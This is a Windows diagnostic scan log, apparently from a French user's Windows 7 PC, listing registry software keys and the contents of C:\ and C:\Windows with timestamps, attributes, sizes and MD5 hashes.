[HKU\S-1-5-21-3594765525-3045979897-1626392610-1000\Software\Adobe]
[HKU\S-1-5-21-3594765525-3045979897-1626392610-1000\Software\AppDataLow]
[HKU\S-1-5-21-3594765525-3045979897-1626392610-1000\Software\ATI]
[HKU\S-1-5-21-3594765525-3045979897-1626392610-1000\Software\Auslogics]
[HKU\S-1-5-21-3594765525-3045979897-1626392610-1000\Software\AVAST Software]
[HKU\S-1-5-21-3594765525-3045979897-1626392610-1000\Software\Blizzard Entertainment]
[HKU\S-1-5-21-3594765525-3045979897-1626392610-1000\Software\Bouygues]
[HKU\S-1-5-21-3594765525-3045979897-1626392610-1000\Software\Bugsplat]
[HKU\S-1-5-21-3594765525-3045979897-1626392610-1000\Software\Camfrog]
[HKU\S-1-5-21-3594765525-3045979897-1626392610-1000\Software\Canneverbe Limited]
[HKU\S-1-5-21-3594765525-3045979897-1626392610-1000\Software\CanonBJ]
[HKU\S-1-5-21-3594765525-3045979897-1626392610-1000\Software\CDDB]
[HKU\S-1-5-21-3594765525-3045979897-1626392610-1000\Software\Chronotron]
[HKU\S-1-5-21-3594765525-3045979897-1626392610-1000\Software\Clients]
[HKU\S-1-5-21-3594765525-3045979897-1626392610-1000\Software\CodeStuff]
[HKU\S-1-5-21-3594765525-3045979897-1626392610-1000\Software\ComodoGroup]
[HKU\S-1-5-21-3594765525-3045979897-1626392610-1000\Software\DIGITAL HAPPINESS]
[HKU\S-1-5-21-3594765525-3045979897-1626392610-1000\Software\Dritek]
[HKU\S-1-5-21-3594765525-3045979897-1626392610-1000\Software\DVDVideoSoft]
[HKU\S-1-5-21-3594765525-3045979897-1626392610-1000\Software\FinalWire]
[HKU\S-1-5-21-3594765525-3045979897-1626392610-1000\Software\g3n-h@ckm@n]
[HKU\S-1-5-21-3594765525-3045979897-1626392610-1000\Software\Google]
[HKU\S-1-5-21-3594765525-3045979897-1626392610-1000\Software\IM Providers]
[HKU\S-1-5-21-3594765525-3045979897-1626392610-1000\Software\Intel]
[HKU\S-1-5-21-3594765525-3045979897-1626392610-1000\Software\IZSoftware]
[HKU\S-1-5-21-3594765525-3045979897-1626392610-1000\Software\JavaSoft]
[HKU\S-1-5-21-3594765525-3045979897-1626392610-1000\Software\kde.org]
[HKU\S-1-5-21-3594765525-3045979897-1626392610-1000\Software\Licenses]
[HKU\S-1-5-21-3594765525-3045979897-1626392610-1000\Software\lnkguard]
[HKU\S-1-5-21-3594765525-3045979897-1626392610-1000\Software\LogMeInRescueCallingCard]
[HKU\S-1-5-21-3594765525-3045979897-1626392610-1000\Software\Macromedia]
[HKU\S-1-5-21-3594765525-3045979897-1626392610-1000\Software\Malwarebytes' Anti-Malware]
[HKU\S-1-5-21-3594765525-3045979897-1626392610-1000\Software\MCAFEE]
[HKU\S-1-5-21-3594765525-3045979897-1626392610-1000\Software\Microsoft]
[HKU\S-1-5-21-3594765525-3045979897-1626392610-1000\Software\Mozilla]
[HKU\S-1-5-21-3594765525-3045979897-1626392610-1000\Software\MozillaPlugins]
[HKU\S-1-5-21-3594765525-3045979897-1626392610-1000\Software\Netscape]
[HKU\S-1-5-21-3594765525-3045979897-1626392610-1000\Software\ODBC]
[HKU\S-1-5-21-3594765525-3045979897-1626392610-1000\Software\Pando Networks]
[HKU\S-1-5-21-3594765525-3045979897-1626392610-1000\Software\Parsec Productions]
[HKU\S-1-5-21-3594765525-3045979897-1626392610-1000\Software\Piriform]
[HKU\S-1-5-21-3594765525-3045979897-1626392610-1000\Software\Policies]
[HKU\S-1-5-21-3594765525-3045979897-1626392610-1000\Software\QtProject]
[HKU\S-1-5-21-3594765525-3045979897-1626392610-1000\Software\Realtek]
[HKU\S-1-5-21-3594765525-3045979897-1626392610-1000\Software\Safer Networking Limited]
[HKU\S-1-5-21-3594765525-3045979897-1626392610-1000\Software\Skype]
[HKU\S-1-5-21-3594765525-3045979897-1626392610-1000\Software\SkypeRS]
[HKU\S-1-5-21-3594765525-3045979897-1626392610-1000\Software\sysinternals]
[HKU\S-1-5-21-3594765525-3045979897-1626392610-1000\Software\TeamViewer]
[HKU\S-1-5-21-3594765525-3045979897-1626392610-1000\Software\Textalk AB]
[HKU\S-1-5-21-3594765525-3045979897-1626392610-1000\Software\Trolltech]
[HKU\S-1-5-21-3594765525-3045979897-1626392610-1000\Software\TuneUp]
[HKU\S-1-5-21-3594765525-3045979897-1626392610-1000\Software\Unity]
[HKU\S-1-5-21-3594765525-3045979897-1626392610-1000\Software\Valve]
[HKU\S-1-5-21-3594765525-3045979897-1626392610-1000\Software\VB and VBA Program Settings]
[HKU\S-1-5-21-3594765525-3045979897-1626392610-1000\Software\Wargaming.net]
[HKU\S-1-5-21-3594765525-3045979897-1626392610-1000\Software\Winamp]
[HKU\S-1-5-21-3594765525-3045979897-1626392610-1000\Software\WinRAR]
[HKU\S-1-5-21-3594765525-3045979897-1626392610-1000\Software\WinRAR SFX]
[HKU\S-1-5-21-3594765525-3045979897-1626392610-1000\Software\Wondershare]
[HKU\S-1-5-21-3594765525-3045979897-1626392610-1000\Software\Wow6432Node]
[HKU\S-1-5-21-3594765525-3045979897-1626392610-1000\Software\ZebHelpProcess Helper]
[HKU\S-1-5-21-3594765525-3045979897-1626392610-1000\SOFTWARE\AppDataLow\Software\JavaSoft]
[HKU\S-1-5-21-3594765525-3045979897-1626392610-1000\SOFTWARE\AppDataLow\Software\Microsoft]
[HKU\S-1-5-21-3594765525-3045979897-1626392610-1000\SOFTWARE\AppDataLow\Software\Unity]
[HKU\S-1-5-21-3594765525-3045979897-1626392610-1000\Software\Microsoft\Windows\CurrentVersion]
[HKU\S-1-5-21-3594765525-3045979897-1626392610-1000\Software\Microsoft\Windows\DWM]
[HKU\S-1-5-21-3594765525-3045979897-1626392610-1000\Software\Microsoft\Windows\Shell]
[HKU\S-1-5-21-3594765525-3045979897-1626392610-1000\Software\Microsoft\Windows\TabletPC]
[HKU\S-1-5-21-3594765525-3045979897-1626392610-1000\Software\Microsoft\Windows\Windows Error Reporting]
[HKU\S-1-5-21-3594765525-3045979897-1626392610-1000\Software\Microsoft\Windows NT\CurrentVersion]





[HKLM\Software\AdsFix]
[HKLM\Software\AMD]
[HKLM\Software\ATI Technologies]
[HKLM\Software\Canneverbe Limited]
[HKLM\Software\Canon]
[HKLM\Software\CBSTEST]
[HKLM\Software\Clients]
[HKLM\Software\ComodoGroup]
[HKLM\Software\Dolby]
[HKLM\Software\DTS]
[HKLM\Software\g3n-h@ckm@n]
[HKLM\Software\Google]
[HKLM\Software\HaaliMkx]
[HKLM\Software\Huawei technologies]
[HKLM\Software\IM Providers]
[HKLM\Software\Intel]
[HKLM\Software\Knowles]
[HKLM\Software\Macromedia]
[HKLM\Software\McAfee.com]
[HKLM\Software\mcafeeupdater]
[HKLM\Software\Microsoft]
[HKLM\Software\Mozilla]
[HKLM\Software\MozillaPlugins]
[HKLM\Software\ODBC]
[HKLM\Software\Piriform]
[HKLM\Software\Policies]
[HKLM\Software\Realtek]
[HKLM\Software\RegisteredApplications]
[HKLM\Software\Safer Networking Limited]
[HKLM\Software\SonicFocus]
[HKLM\Software\SRS Labs]
[HKLM\Software\Sysinternals]
[HKLM\Software\TuneUp]
[HKLM\Software\Waves Audio]
[HKLM\Software\WinRAR]
[HKLM\Software\Wow6432Node]
[HKLM\Software\Microsoft\Windows\CurrentVersion]
[HKLM\Software\Microsoft\Windows\HTML Help]
[HKLM\Software\Microsoft\Windows\ITStorage]
[HKLM\Software\Microsoft\Windows\ScheduledDiagnostics]
[HKLM\Software\Microsoft\Windows\ScriptedDiagnosticsProvider]
[HKLM\Software\Microsoft\Windows\Tablet PC]
[HKLM\Software\Microsoft\Windows\TabletPC]
[HKLM\Software\Microsoft\Windows\Windows Error Reporting]
[HKLM\Software\Microsoft\Windows\Windows Search]
[HKLM\Software\Microsoft\Windows NT\CurrentVersion]
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SvcHost\AxInstSVGroup]
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SvcHost\defragsvc]
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SvcHost\GPSvcGroup]
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SvcHost\LocalService]
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SvcHost\LocalServiceAndNoImpersonation]
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SvcHost\LocalServiceNetworkRestricted]
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SvcHost\LocalServiceNoNetwork]
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SvcHost\LocalSystemNetworkRestricted]
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SvcHost\netsvcs]
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SvcHost\NetworkService]
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SvcHost\NetworkServiceRemoteDesktopHyperVAgent]
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SvcHost\NetworkServiceRemoteDesktopPublishing]
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SvcHost\SDRSVC]
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SvcHost\swprv]
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SvcHost\termsvcs]
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SvcHost\utcsvc]
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SvcHost\wcssvc]
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SvcHost\wercplsupport]

[HKLM\Software\WOW6432Node\Adobe]
[HKLM\Software\WOW6432Node\AdwCleaner]
[HKLM\Software\WOW6432Node\ATI]
[HKLM\Software\WOW6432Node\ATI Technologies]
[HKLM\Software\WOW6432Node\BcmSetup]
[HKLM\Software\WOW6432Node\Bouygues]
[HKLM\Software\WOW6432Node\Camfrog]
[HKLM\Software\WOW6432Node\CDDB]
[HKLM\Software\WOW6432Node\Chronotron]
[HKLM\Software\WOW6432Node\DigitalWave]
[HKLM\Software\WOW6432Node\DivXNetworks]
[HKLM\Software\WOW6432Node\Dritek]
[HKLM\Software\WOW6432Node\DVDVideoSoft]
[HKLM\Software\WOW6432Node\Google]
[HKLM\Software\WOW6432Node\IM Providers]
[HKLM\Software\WOW6432Node\InstallShield]
[HKLM\Software\WOW6432Node\Intel]
[HKLM\Software\WOW6432Node\JavaSoft]
[HKLM\Software\WOW6432Node\JreMetrics]
[HKLM\Software\WOW6432Node\Lavasoft]
[HKLM\Software\WOW6432Node\LogMeInRescueCallingCard]
[HKLM\Software\WOW6432Node\Macromedia]
[HKLM\Software\WOW6432Node\Malwarebytes' Anti-Malware]
[HKLM\Software\WOW6432Node\McAfee.com]
[HKLM\Software\WOW6432Node\mcafeeupdater]
[HKLM\Software\WOW6432Node\Microsoft]
[HKLM\Software\WOW6432Node\Mozilla]
[HKLM\Software\WOW6432Node\mozilla.org]
[HKLM\Software\WOW6432Node\MozillaPlugins]
[HKLM\Software\WOW6432Node\Nullsoft]
[HKLM\Software\WOW6432Node\ODBC]
[HKLM\Software\WOW6432Node\Pando Networks]
[HKLM\Software\WOW6432Node\PluginProtect]
[HKLM\Software\WOW6432Node\Propellerhead Software]
[HKLM\Software\WOW6432Node\Realtek]
[HKLM\Software\WOW6432Node\Realtek Semiconductor Corp.]
[HKLM\Software\WOW6432Node\Safer Networking Limited]
[HKLM\Software\WOW6432Node\Skype]
[HKLM\Software\WOW6432Node\TeamViewer]
[HKLM\Software\WOW6432Node\TuneUp]
[HKLM\Software\WOW6432Node\Turbine]
[HKLM\Software\WOW6432Node\VideoLAN]
[HKLM\Software\WOW6432Node\Volatile]
[HKLM\Software\WOW6432Node\Wondershare]
[HKLM\Software\WOW6432Node\Wow6432Node]
[HKLM\Software\WOW6432Node\Clients]
[HKLM\Software\WOW6432Node\Policies]
[HKLM\Software\WOW6432Node\RegisteredApplications]
[HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion]
[HKLM\Software\WOW6432Node\Microsoft\Windows\HTML Help]
[HKLM\Software\WOW6432Node\Microsoft\Windows\ITStorage]
[HKLM\Software\WOW6432Node\Microsoft\Windows\ScriptedDiagnosticsProvider]
[HKLM\Software\WOW6432Node\Microsoft\Windows\Windows Error Reporting]
[HKLM\Software\WOW6432Node\Microsoft\Windows\Windows Search]
[HKLM\Software\WOW6432Node\Microsoft\Windows\Tablet PC]
[HKLM\Software\WOW6432Node\Microsoft\Windows NT\CurrentVersion]
[HKLM\Software\WOW6432Node\Microsoft\Windows NT\CurrentVersion\SvcHost\LocalService]
[HKLM\Software\WOW6432Node\Microsoft\Windows NT\CurrentVersion\SvcHost\LocalServiceAndNoImpersonation]
[HKLM\Software\WOW6432Node\Microsoft\Windows NT\CurrentVersion\SvcHost\LocalServiceNetworkRestricted]
[HKLM\Software\WOW6432Node\Microsoft\Windows NT\CurrentVersion\SvcHost\LocalServiceNoNetwork]
[HKLM\Software\WOW6432Node\Microsoft\Windows NT\CurrentVersion\SvcHost\LocalSystemNetworkRestricted]
[HKLM\Software\WOW6432Node\Microsoft\Windows NT\CurrentVersion\SvcHost\netsvcs]
[HKLM\Software\WOW6432Node\Microsoft\Windows NT\CurrentVersion\SvcHost\NetworkService]
[HKLM\Software\WOW6432Node\Microsoft\Windows NT\CurrentVersion\SvcHost\NetworkServiceRemoteDesktopHyperVAgent]
[HKLM\Software\WOW6432Node\Microsoft\Windows NT\CurrentVersion\SvcHost\NetworkServiceRemoteDesktopPublishing]
[HKLM\Software\WOW6432Node\Microsoft\Windows NT\CurrentVersion\SvcHost\termsvcs]
[HKLM\Software\WOW6432Node\Microsoft\Windows NT\CurrentVersion\SvcHost\wcssvc]


---------- | Drives


---------- | C:

[17/07/2016 23:17:40] - |SHD| - [673863] - C:\$RECYCLE.BIN
[30/10/2015 21:24:28] - |HD| - [6330848839] - C:\$WINDOWS.~BT
[20/07/2013 02:26:06] - |D| - [145235447775] - C:\1)  MES VIDEOS
[20/07/2013 01:37:14] - |D| - [50296095781] - C:\2)  MA  MUSIQUE
[20/07/2013 02:16:38] - |D| - [2839447289] - C:\3)   MES  PHOTOS
[20/07/2013 02:19:51] - |D| - [0] - C:\3et demi)  MES VIDEOS PERSO
[17/07/2016 13:04:38] - |D| - [364617384] - C:\AdsFix
[MD5.37C10A9E0D531FD2DE2A9F54AC993C3F] - [17/07/2016 13:06:57] - |A| - (.-.) - [26650] - (0.0.0.0) - C:\AdsFix_17_07_2016_23_16_11.txt
[14/11/2014 00:49:01] - |D| - [267412441] - C:\AdwCleaner
[MD5.5FC2F3AF5BCAC3A0A625E2E73583D7D1] - [26/02/2013 19:06:18] - |A| - (.-.) - [10962] - (0.0.0.0) - C:\AdwCleaner[S1].txt
[MD5.22B439157CA9656E9E83FC48EDCD191C] - [26/02/2013 19:26:30] - |A| - (.-.) - [1166] - (0.0.0.0) - C:\AdwCleaner[S2].txt
[20/07/2013 02:20:04] - |D| - [6703829902] - C:\ANDRES ERIC
[MD5.D41D8CD98F00B204E9800998ECF8427E] - [25/06/2016 06:46:02] - |A| - (.-.) - [0] - (0.0.0.0) - C:\autoexec.bat
[MD5.B27D152D4B9081647191377902E1127C] - [18/11/2014 11:36:50] - |A| - (.-.) - [391488] - (0.0.0.0) - C:\capture d'ecran 1.png
[MD5.639CB059742DAD3F677E95B3E05FE61A] - [18/11/2014 11:34:53] - |A| - (.-.) - [296406] - (0.0.0.0) - C:\capture d'ecran.png
[16/07/2016 12:02:15] - |SHD| - [0] - C:\Config.Msi
[MD5.3241003280F567A5BFE08E730E40E2F2] - [24/01/2014 19:50:18] - |A| - (.-.) - [181] - (0.0.0.0) - C:\console.log
[14/07/2009 07:08:56] - |SHD| - [0] - C:\Documents and Settings
[16/07/2016 16:06:03] - |D| - [199827670] - C:\FRST
[MD5.E7832D67AD190A920970CB5ADFC6D5D1] - [02/11/2015 12:28:48] - |A| - (.-.) - [383] - (0.0.0.0) - C:\ftconfig.ini
[MD5.D41D8CD98F00B204E9800998ECF8427E] - [17/07/2016 23:16:11] - |ASH| - (.-.) - [4723863552] - (0.0.0.0) - C:\hiberfil.sys
[27/03/2014 12:53:25] - |D| - [17552] - C:\Intel
[MD5.691375C539227F0CC7A44382B53C8F4C] - [20/07/2013 02:26:05] - |A| - (.-.) - [21723431] - (0.0.0.0) - C:\le live pour les enfants(clip video inedit) floxytek-electro.wmv
[MD5.E21D807025B31E6D61C1DF06849450E7] - [18/07/2016 20:52:36] - |A| - (.-.) - [15260] - (0.0.0.0) - C:\mbam.txt
[MD5.D41D8CD98F00B204E9800998ECF8427E] - [27/01/2013 19:03:18] - |ASH| - (.-.) - [4294967296] - (0.0.0.0) - C:\pagefile.sys
[14/07/2009 05:20:08] - |D| - [0] - C:\PerfLogs
[MD5.BB981F42F8929F4515CDE79C40FF8CF5] - [20/07/2013 02:26:05] - |A| - (.-.) - [223933] - (0.0.0.0) - C:\Photo de moi 1.png
[MD5.5AF9CC91436D92384C171DB923001586] - [20/07/2013 02:26:06] - |A| - (.-.) - [68] - (0.0.0.0) - C:\pmp_usb.ini
[14/07/2009 05:20:08] - |RD| - [829989420] - C:\Program Files
[14/07/2009 05:20:08] - |RD| - [2865114983] - C:\Program Files (x86)
[14/07/2009 05:20:08] - |HD| - [47998421156] - C:\ProgramData
[19/07/2016 22:56:01] - |D| - [262056] - C:\QuickDiag
[MD5.4516B97D423D3CD0FD6A745CFA5C0E30] - [23/07/2016 18:25:15] - |A| - (.-.) - [365572] - (0.0.0.0) - C:\QuickDiag.txt
[MD5.F4A27160CF243D7F5ABD43E5F88465B3] - [19/07/2016 23:27:39] - |RA| - (.-.) - [514236] - (0.0.0.0) - C:\QuickDiag_19_07_2016_23_27_39.txt
[MD5.76755F880BBC81B277C11337E7C42C65] - [19/07/2016 23:27:39] - |A| - (.-.) - [67078] - (0.0.0.0) - C:\QuickDiag_MD5.txt
[20/07/2013 02:26:03] - |D| - [15005791] - C:\R.T 508
[17/08/2012 09:53:24] - |SHD| - [174130820] - C:\Recovery
[20/07/2013 02:26:05] - |D| - [0] - C:\SamsungRecovery
[12/02/2016 22:54:19] - |RD| - [177010801] - C:\Sandbox
[20/07/2013 05:13:12] - |D| - [52224] - C:\SHAMAN KING
[19/05/2016 20:39:25] - |D| - [4548] - C:\Spacekace
[17/08/2012 15:47:09] - |SHD| - [0] - C:\System Volume Information
[20/07/2013 05:55:27] - |D| - [12267418709] - C:\The.Fast.and.The.Furious.Quadrilogy.720p.BRRip.XviD-SHiRK
[14/07/2009 05:20:08] - |RD| - [287111171061] - C:\Users
[MD5.A5726DFE408CF2DE1B2DAF6A5EB9526E] - [20/07/2013 02:26:06] - |A| - (.-.) - [292327] - (0.0.0.0) - C:\Video call snapshot 1.png
[MD5.2814AE20AD4AF68FF41E482ED3693FED] - [20/07/2013 02:26:06] - |A| - (.-.) - [215711] - (0.0.0.0) - C:\Video call snapshot 2.png
[MD5.5E15C5D5B7B7B745CD99CA9770FF835F] - [20/07/2013 02:26:06] - |A| - (.-.) - [208244] - (0.0.0.0) - C:\Video call snapshot 3.png
[MD5.BD25799212903EAF2B73EF62974677E5] - [20/07/2013 02:26:06] - |A| - (.-.) - [217055] - (0.0.0.0) - C:\Video call snapshot 4.png
[MD5.BF0B0D29B43A6F2A8272160C8960A2B4] - [20/07/2013 02:26:06] - |A| - (.-.) - [253228] - (0.0.0.0) - C:\Video call snapshot 5.png
[20/07/2013 06:03:30] - |D| - [3475879936] - C:\VIDEO TS
[MD5.E647E6AF65AB28336A08DFFE573A79AD] - [20/07/2013 02:26:06] - |A| - (.-.) - [4342137] - (0.0.0.0) - C:\winamp_metadata.dat
[MD5.EA012EE6A5AACEDA8B1E6165B2E6BB0D] - [20/07/2013 02:26:06] - |A| - (.-.) - [113428] - (0.0.0.0) - C:\winamp_metadata.idx
[14/07/2009 05:20:08] - |D| - [38257287101] - C:\Windows
[MD5.50DEC005C7D33469A710DEB3B3A150AB] - [03/10/2015 21:55:45] - |RA| - (.-.) - [734818304] - (0.0.0.0) - C:\[ www.Cpasbien.pw ] Exists.2014.STV.FRENCH.BRRip.XviD-DesTroY.avi
[MD5.5C785900192A0AEE9018C6EE153B20CA] - [03/10/2015 21:56:09] - |RA| - (.-.) - [1979889139] - (0.0.0.0) - C:\[ www.CpasBien.pw ] Jurassic.World.2015.TRUEFRENCH.WEBRip.MD.XviD-ETERNiTY.avi
[MD5.1D6EF799BCC34C0A8E8E350729210BB9] - [03/10/2015 21:57:15] - |RA| - (.-.) - [943218215] - (0.0.0.0) - C:\[ www.CpasBien.pw ] La.terre.des.guerriers.2014.LiMiTED.FRENCH.BDRip.x264-MELBA.mkv
[MD5.B16F7AC3D62BE961ACB255EB8A8BD481] - [03/10/2015 21:54:57] - |RA| - (.-.) - [1461975376] - (0.0.0.0) - C:\[ www.CpasBien.pw ] Mad.Max.Fury.Road.2015.FRENCH.BDRip.XviD-GLUPS.avi
[MD5.3E6C3554185B2A53055AE7E765C70100] - [03/10/2015 22:00:24] - |A| - (.-.) - [648759295] - (0.0.0.0) - C:\[ www.Cpasbien.pw ] Penguins.of.Madagascar.2014.TRUEFRENCH.R6.MD.XviD-NoPuB.avi
[MD5.51E9E4095B00B10EA16FF70FF86DC081] - [03/10/2015 22:00:44] - |A| - (.-.) - [1466691588] - (0.0.0.0) - C:\[ www.CpasBien.pw ] Poltergeist.2015.EXTENDED.TRUEFRENCH.BDRip.XviD.AC3-GLUPS.avi
[MD5.852D0BAC8181BD4DD69A95CEA2B13095] - [03/10/2015 22:01:32] - |RA| - (.-.) - [739536968] - (0.0.0.0) - C:\[ www.Cpasbien.pw ] The Voices.2014.TRUEFRENCH.BRRip.Xvid-BLUB.avi

---------- | C:\Windows

[14/07/2009 05:20:08] - |D| - [22099383] - C:\Windows\AppCompat
[14/07/2009 05:20:08] - |D| - [11036468] - C:\Windows\AppPatch
[14/07/2009 05:20:08] - |RSD| - [1947692924] - C:\Windows\assembly
[MD5.0402B38619D66154095715D09099DC95] - [30/03/2014 20:45:44] - |A| - (.-.) - [21360] - (0.0.0.0) - C:\Windows\atiogl.xml
[MD5.D41D8CD98F00B204E9800998ECF8427E] - [07/02/2013 12:26:55] - |A| - (.-.) - [0] - (0.0.0.0) - C:\Windows\ativpsrm.bin
[MD5.317CD1CE327B6520BF4EE007BCD39E61] - [21/11/2010 05:24:22] - |A| - (.© Microsoft Corporation. Tous droits réservés. - Utilitaire de service de fichier de démarrage.) - [71168] - (6.1.7601.17514) - C:\Windows\bfsvc.exe
[14/07/2009 05:20:09] - |D| - [29163158] - C:\Windows\Boot
[MD5.E878A659C070DE9AC64DD6E5EC896DD3] - [14/07/2009 07:38:36] - |AS| - (.-.) - [67584] - (0.0.0.0) - C:\Windows\bootstat.dat
[14/07/2009 05:20:09] - |D| - [3233280] - C:\Windows\Branding
[MD5.25F153D1A2FF32026776420B5144E70B] - [27/01/2013 20:22:33] - |A| - (.-.) - [6648] - (0.0.0.0) - C:\Windows\CUAppUsage.Dat
[14/07/2009 05:20:09] - |D| - [2113488] - C:\Windows\Cursors
[14/07/2009 06:45:54] - |D| - [2930] - C:\Windows\debug
[14/07/2009 07:32:38] - |D| - [2774440] - C:\Windows\diagnostics
[14/07/2009 07:37:46] - |D| - [0] - C:\Windows\DigitalLocker
[14/07/2009 07:32:38] - |D| - [65] - C:\Windows\Downloaded Program Files
[14/07/2009 07:37:46] - |D| - [0] - C:\Windows\en-US
[MD5.E185BDA84E5F03F4E1D8DCA30E209277] - [17/08/2012 10:07:48] - |A| - (.-.) - [1912] - (0.0.0.0) - C:\Windows\epplauncher.mif
[MD5.9DA3B83F80E205B6C601EEE1312FD0A0] - [15/06/2016 01:52:14] - |A| - (.© Microsoft Corporation. Tous droits réservés. - Explorateur Windows.) - [3231232] - (6.1.7601.23418) - C:\Windows\explorer.exe
[14/07/2009 05:20:09] - |RSD| - [471623583] - C:\Windows\Fonts
[22/12/2014 17:45:14] - |D| - [117440] - C:\Windows\fr
[12/04/2011 11:16:36] - |D| - [142848] - C:\Windows\fr-FR
[MD5.92BB2E9AA28542C685C59EFCBAC2490B] - [14/07/2009 01:22:13] - |A| - (.© Microsoft Corporation. Tous droits réservés. - Utilitaire de service de chiffrement de lecteur BitLocker.) - [15360] - (6.1.7600.16385) - C:\Windows\fveupdate.exe
[14/07/2009 05:20:09] - |D| - [21741460] - C:\Windows\Globalization
[14/07/2009 05:20:09] - |D| - [40554785] - C:\Windows\Help
[MD5.CD47548A52B02D254BF6D7F7A5F2BFD3] - [14/07/2009 02:29:53] - |A| - (.© Microsoft Corporation. Tous droits réservés. - Aide et support Microsoft.) - [733696] - (6.1.7600.16385) - C:\Windows\HelpPane.exe
[MD5.3D0B9EA79BF1F828324447D84AA9DCE2] - [14/07/2009 02:29:03] - |A| - (.© Microsoft Corporation. Tous droits réservés. - Exécutable de l’aide HTML Microsoft®.) - [16896] - (6.1.7600.16385) - C:\Windows\hh.exe
[MD5.1AEB4967A760D6EC21A3270F1B004AC1] - [12/04/2011 11:28:50] - |A| - (.-.) - [48265] - (0.0.0.0) - C:\Windows\HomePremium.xml
[14/07/2009 05:20:09] - |D| - [143547244] - C:\Windows\IME
[14/07/2009 05:20:10] - |D| - [159435203] - C:\Windows\inf
[17/08/2012 10:05:21] - |SHD| - [3095522079] - C:\Windows\Installer
[14/07/2009 05:20:10] - |D| - [48371] - C:\Windows\L2Schemas
[14/07/2009 05:20:10] - |D| - [55295050] - C:\Windows\LiveKernelReports
[MD5.66E4EFA6CACCC787604772D8F418CA4F] - [07/02/2013 12:21:00] - |A| - (.-.) - [184] - (0.0.0.0) - C:\Windows\LMv4.UNI
[14/07/2009 05:20:10] - |D| - [97542436] - C:\Windows\Logs
[14/07/2009 05:20:10] - |RSD| - [13327133] - C:\Windows\Media
[MD5.23AF90D2355D8C83AA4567EF1763B467] - [14/07/2009 02:10:29] - |A| - (.-.) - [43131] - (0.0.0.0) - C:\Windows\mib.bin
[14/07/2009 05:20:10] - |D| - [977996966] - C:\Windows\Microsoft.NET
[01/03/2014 13:01:50] - |D| - [5524] - C:\Windows\Migration
[13/09/2014 12:38:19] - |D| - [0] - C:\Windows\Minidump
[14/07/2009 05:20:10] - |D| - [0] - C:\Windows\ModemLogs
[MD5.B9FB94A8DA62711C6955825DEFB25C5A] - [14/07/2009 04:35:42] - |A| - (.-.) - [1405] - (0.0.0.0) - C:\Windows\msdfmap.ini
[05/05/2013 13:23:56] - |HD| - [0] - C:\Windows\msdownld.tmp
[MD5.B32189BDFF6E577A92BAA61AD49264E6] - [12/08/2015 04:00:50] - |A| - (.© Microsoft Corporation. Tous droits réservés. - Bloc-notes.) - [193536] - (6.1.7601.18917) - C:\Windows\notepad.exe
[MD5.1979313E42A2F61FB7475459436A0757] - [15/12/2014 10:09:12] - |A| - (.-.) - [85986] - (0.0.0.0) - C:\Windows\ocsetup_cbs_install_NetFx3.txt
[MD5.FA00DECE1AC0ABE9A4583F62081458EB] - [15/12/2014 10:09:12] - |A| - (.-.) - [131072] - (0.0.0.0) - C:\Windows\ocsetup_install_NetFx3.etl
[14/07/2009 07:32:38] - |D| - [65] - C:\Windows\Offline Web Pages
[17/08/2012 16:46:40] - |D| - [1380580] - C:\Windows\Panther
[22/12/2014 17:41:33] - |D| - [0] - C:\Windows\PCHEALTH
[14/07/2009 07:32:38] - |D| - [63016760] - C:\Windows\Performance
[14/07/2009 05:20:10] - |D| - [1132015] - C:\Windows\PLA
[14/07/2009 05:20:10] - |D| - [2919420] - C:\Windows\PolicyDefinitions
[17/08/2012 15:48:00] - |D| - [45377119] - C:\Windows\Prefetch
[24/03/2013 12:00:48] - |D| - [2056] - C:\Windows\pss
[MD5.2E2C937846A0B8789E5E91739284D17A] - [14/07/2009 01:27:10] - |A| - (.© Microsoft Corporation. Tous droits réservés. - Éditeur du Registre.) - [427008] - (6.1.7600.16385) - C:\Windows\regedit.exe
[14/07/2009 05:20:10] - |D| - [1117200] - C:\Windows\registration
[14/07/2009 05:20:10] - |D| - [8207010] - C:\Windows\rescache
[14/07/2009 05:20:10] - |D| - [1674534] - C:\Windows\Resources
[MD5.2A7B78F4CFA0F1A5655891DDAACEFAD9] - [07/02/2013 12:24:22] - |A| - (.Copyright (C) 2012 Realtek Semiconductor Corp. - RtlExUpd DLL for setup utility function.) - [1706640] - (1.0.3.8) - C:\Windows\RtlExUpd.dll
[14/07/2009 05:20:10] - |D| - [0] - C:\Windows\SchCache
[14/07/2009 05:20:10] - |D| - [58021] - C:\Windows\schemas
[14/07/2009 05:20:10] - |D| - [1056768] - C:\Windows\security
[14/07/2009 06:45:47] - |D| - [232097845] - C:\Windows\ServiceProfiles
[14/07/2009 05:20:10] - |D| - [165559853] - C:\Windows\servicing
[14/07/2009 06:45:50] - |D| - [42] - C:\Windows\Setup
[MD5.D74E3C688AA4F552EB9F55CB8EA67170] - [23/07/2016 18:17:30] - |A| - (.-.) - [56] - (0.0.0.0) - C:\Windows\setupact.log
[MD5.D41D8CD98F00B204E9800998ECF8427E] - [23/07/2016 18:17:30] - |A| - (.-.) - [0] - (0.0.0.0) - C:\Windows\setuperr.log
[MD5.07F22855D56A2F164CA25656D09E1157] - [29/10/2013 00:06:50] - |A| - (.-.) - [96176] - (0.0.0.0) - C:\Windows\smartkeydiagnostics.txt
[19/12/2012 16:08:50] - |D| - [1345422260] - C:\Windows\SoftwareDistribution
[17/08/2012 15:50:19] - |D| - [116560328] - C:\Windows\SoftwareDistribution.Old
[14/07/2009 05:20:10] - |D| - [70579144] - C:\Windows\Speech
